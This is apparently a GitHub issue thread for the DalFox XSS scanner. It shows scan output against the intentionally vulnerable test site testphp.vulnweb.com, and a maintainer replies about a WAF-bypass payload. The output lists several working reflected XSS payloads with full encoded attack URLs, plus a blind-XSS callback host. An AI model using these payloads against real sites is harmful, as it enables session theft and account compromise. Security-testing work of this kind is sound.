You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
_..._
.' .::::. __ _ _ ___ _ __ __
: :::::::: | \ / \ | | | __/ \\ V /
: :::::::: | o ) o || |_ | _( o )) (
'. '::::::' |__/|_n_||___||_| \_//_n_\
'-.::''
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff
[*] Vaild target [ code:200 / size:4699 ]
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[I] Content-Type is text/html
[I] Reflected cat param => inHTML[1] $
48 line: Error: Unknown column '123DalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. 🛠
[*] Added your blind XSS (https://vrsky.xss.ht)
[*] Start XSS Scanning.. with 149 queries 🗡
[W] Reflected Payload in HTML: cat="><iFrAme/src=jaVascRipt:alert(45)></iFramE>
48 line: syntax to use near '"><iFrAme/src=jaVascRipt:alert(45)></iFramE>' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert%2845%29%3E%3C%2FiFramE%3E
[W] Reflected Payload in HTML: cat="><SvG/onload=alert(45) id=dalfox>
48 line: syntax to use near '"><SvG/onload=alert(45) id=dalfox>' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3CSvG%2Fonload%3Dalert%2845%29+id%3Ddalfox%3E
[W] Reflected Payload in HTML: cat='>asd
48 line: syntax to use near ''>asd' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%3Easd
[W] Reflected Payload in HTML: cat="><svg/OnLoad="`${prompt``}`">
48 line: syntax to use near '"><svg/OnLoad="`${prompt``}`">' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22%3E
[W] Reflected Payload in HTML: cat="><d3"<"/onclick="45 class=dalfox>[confirm``]"<">z
48 line: syntax to use near '"><d3"<"/onclick="45 class=dalfox>[confirm``]"<">z' at line
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cd3%22%3C%22%2Fonclick%3D%2245+class%3Ddalfox%3E%5Bconfirm%60%60%5D%22%3C%22%3Ez
[W] Reflected Payload in HTML: cat='"><img/src/onerror=.1|alert``>
48 line: syntax to use near ''"><img/src/onerror=.1|alert``>' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60%3E
[W] Reflected Payload in HTML: cat="><script/"<a"/src=data:=".<a,[45].some(confirm)>
48 line: syntax to use near '"><script/"<a"/src=data:=".<a,[45].some(confirm)>' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cscript%2F%22%3Ca%22%2Fsrc%3Ddata%3A%3D%22.%3Ca%2C%5B45%5D.some%28confirm%29%3E
[W] Reflected Payload in HTML: cat="><w="/x="y>"/class=dalfox/ondblclick=`<`[confirm``]>z
48 line: syntax to use near '"><w="/x="y>"/class=dalfox/ondblclick=`<`[confirm``]>z' at l
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cw%3D%22%2Fx%3D%22y%3E%22%2Fclass%3Ddalfox%2Fondblclick%3D%60%3C%60%5Bconfirm%60%60%5D%3Ez
[V] Triggered XSS Payload (found DOM Object): cat=</script><svg><script/class=dalfox>alert(45)-%26apos%3B
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%3C%2Fscript%3E%3Csvg%3E%3Cscript%2Fclass%3Ddalfox%3Ealert%2845%29-%26apos%3B
[*] Finish :D
Until now is good, says we found a XSS there, lets take a looks:
[V] Triggered XSS Payload (found DOM Object): cat=</script><svg><script/class=dalfox>alert(45)-%26apos%3B
PS: Would be very nice a "dalfox -v" to show version, when people open issues they can always send it to show they have updated version, saves your time with wrong issues.
The text was updated successfully, but these errors were encountered:
Hi @bsysop
Well, first of all, I need to fix that payload. (it is WAF Bypassing payload, but I think we should increase the probability of triggering.)
I'll commit and reflect it when it's modified! And the version option will be add with the update option at the release! (Maybe this weekend)
Thank you so much for your good opinion, my friend :D
Oh, and to prevent too many relfected log, I've been blocking the checking of that parameter since verify was successful. so the payload found will be different for each test case.
The important thing is that the parameter is vulnerable lol
Hi my man! Testing your awesome tool!
Just looks it perfectly found XSS, but with wrong payload, take a look.
Just to show is a updated version:
dalfox url "http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff"
Until now is good, says we found a XSS there, lets take a looks:
So it will be:
But that dont pop XSS.
I just change a little it to confirm is a valid find.
Thanks mate.
PS: Would be very nice a "dalfox -v" to show version, when people open issues they can always send it to show they have updated version, saves your time with wrong issues.
The text was updated successfully, but these errors were encountered: